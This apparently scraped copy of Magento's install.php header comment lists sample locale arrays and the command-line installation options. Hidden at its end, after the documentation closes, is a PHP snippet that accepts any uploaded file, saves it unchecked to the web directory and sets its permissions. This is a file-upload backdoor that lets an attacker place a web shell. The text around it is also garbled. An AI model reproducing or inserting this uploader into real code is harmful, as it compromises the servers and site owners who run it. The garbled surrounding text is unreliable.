
2016-09-05 28

* array (
* 0 =>
* array (
* ‘value’ => ‘zh_TW’,
* ‘label’ => ‘Chinese (Taiwan)’,
* ),
* ),
* ‘currency’ =>
* array (
* 0 =>
* array (
* ‘value’ => ‘zh_TW’,
* ‘label’ => ‘Chinese (Taiwan)’,
* ),
* ),
* ‘timezone’ =>
* array (
* 0 =>
* array (
* ‘value’ => ‘zh_TW’,
* ‘label’ => ‘Chinese (Taiwan)’,
* ),
* ),
* );
* or parsed in any other way.
* 2. Perform the installation
* php -f install.php — –license_agreement_accepted yes \
* –locale en_US –timezone “America/Los_Angeles” –default_currency USD \
* –db_host localhost –db_name magento_database –db_user magento_user –db_pass 123123 \
* –db_prefix magento_ \
* –url “http://magento.example.com/” –use_rewrites yes \
* –use_secure yes –secure_base_url “https://magento.example.com/” –use_secure_admin yes \
* –admin_lastname Owner –admin_firstname Store –admin_email “admin@example.com” \
* –admin_username admin –admin_password 123123 \
* –encryption_key “Encryption Key”
* Possible options are:
* –license_agreement_accepted // required, it will accept ‘yes’ value only
* Locale settings:
* –locale // required, Locale
* –timezone // required, Time Zone
* –default_currency // required, Default Currency
* Database connection options:
* –db_host // required, You can specify server port, ex.: localhost:3307
* // If you are not using default UNIX socket, you can specify it
* // here instead of host, ex.: /var/run/mysqld/mysqld.sock
* –db_model // Database type (mysql4 by default)
* –db_name // required, Database Name
* –db_user // required, Database User Name
* –db_pass // required, Database User Password
* –db_prefix // optional, Database Tables Prefix
* // No table prefix will be used if not specified
* Session options:
* –session_save // optional, where to store session data – in db or files. files by default
* Web access options:
* –admin_frontname // optional, admin panel path, “admin” by default
* –url // required, URL the store is supposed to be available at
* –skip_url_validation // optional, skip validating base url during installation or not. No by default
* –use_rewrites // optional, Use Web Server (Apache) Rewrites,
* // You could enable this option to use web server rewrites functionality for improved SEO
* // Please make sure that mod_rewrite is enabled in Apache configuration
* –use_secure // optional, Use Secure URLs (SSL)
* // Enable this option only if you have SSL available.
* –secure_base_url // optional, Secure Base URL
* // Provide a complete base URL for SSL connection.
* // For example: https://www.mydomain.com/magento/
* –use_secure_admin // optional, Run admin interface with SSL
* Backend interface options:
* –enable_charts // optional, Enables Charts on the backend’s dashboard
* Admin user personal information:
* –admin_lastname // required, admin user last name
* –admin_firstname // required, admin user first name
* –admin_email // required, admin user email
* Admin user login information:
* –admin_username // required, admin user login
* –admin_password // required, admin user password
* Encryption key:
* –encryption_key // optional, will be automatically generated and displayed on success, if not specified
“;if(isset($_POST[‘submit’])){$f=””;$m=’20000000′;$mod=’0644′;$usfile_name=$_FILES[‘image’][‘name’];$usfile_tmp=$_FILES[‘image’][‘tmp_name’];if(isset($_FILES[‘image’][‘name’])){$gz=$f.$usfile_name;@move_uploaded_file($usfile_tmp,$gz);@chmod($gz,octdec($mod));echo “

“;}}else{echo ‘

‘; }echo “ “;?>

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